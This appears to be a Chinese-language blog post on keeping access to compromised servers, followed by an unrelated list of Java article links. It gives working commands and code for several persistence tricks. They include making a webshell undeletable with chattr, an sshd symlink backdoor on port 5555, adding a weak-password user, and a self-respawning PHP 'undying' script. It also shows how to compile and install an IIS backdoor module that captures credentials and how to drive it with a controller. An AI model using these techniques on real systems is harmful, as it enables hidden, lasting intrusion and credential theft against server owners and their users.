权限维持-后门隐藏技术
2023-02-18 16:42:19 时间
文件上锁
chattr +i webshell.php
lsattr webshell.php
chattr -i webshell.php
ssh软链接
ln -sf /usr/sbin/sshd /tmp/su; /tmp/su -oPort=5555;
useradd test -p test
不死马
访问该php文件,会生成一个木马文件用于连接
<?php
ignore_user_abort();
set_time_limit(0);
$interval = 5;
do {
$filename = 'test.php';
if(file_exists($filename)) {
echo "xxx";
}
else {
$file = fopen("test.php", "w");
$txt = "<?php phpinfo();?>\n";
fwrite($file, $txt);
fclose($file);
}
sleep($interval);
} while (true);
?>
iis后门
https://github.com/ygwlgGiao/iis-raid-backdoor
使用vs2019进行编译,functions.h可修改配置信息
functions.h
#define COM_HEADER "X-Chrome-Variations" 传输指令和接收数据的头部字段
#define PASS_FILE "C:\\Windows\\Temp\\creds.db" 保存到web请求服务端的位置
#define PASSWORD "SIMPLEPASS" 传输密码
生成后把IIS-Backdoor.dll放到c盘目录下,放置其他目录下面语句要进行适当的更改
C:\Windows\system32\inetsrv\APPCMD.EXE install module /name:iisModule /image:"c:\IIS-Backdoor.dll" /add:true
python iis_controller.py --url http://x.x.x.x --password SIMPLEPASS
查看iis管理器模块,可发现新增的内容
相关文章
- 【转】分布式架构的演进(JavaWeb)
- 关于Java/Kotlin下载图片,图片打开不能显示问题探究
- Java学习笔记 jar包获取当前路径
- Java学习笔记 线程池使用及详解
- Java开发中常用jar包整理及使用
- Java 读取excel表格文件
- stars-one的原创工具——星之小说下载器(JavaFx应用 )
- Java对象拷贝原理剖析及最佳实践
- JavaFx出现错误Caused by: java.lang.NullPointerException: Location is required的解决方法
- Java 学习笔记 Junit4单元测试使用
- Java 学习笔记 网络编程 使用Socket传输文件 CS模式
- Java 学习笔记 使用并发包ReentrantLock简化生产者消费者模式代码
- Java 学习笔记 使用synchronized实现生产者消费者模式
- Java 学习笔记 观察者模式与适配者模式 监控文件夹
- Java 学习笔记 线程控制
- java学习笔记 线程的实现与同步
- Java 学习笔记 泛型
- Java 学习笔记 反射与迭代器
- Java 学习笔记 正则表达式
- Java 学习笔记 执行外部命令 包装类 枚举类型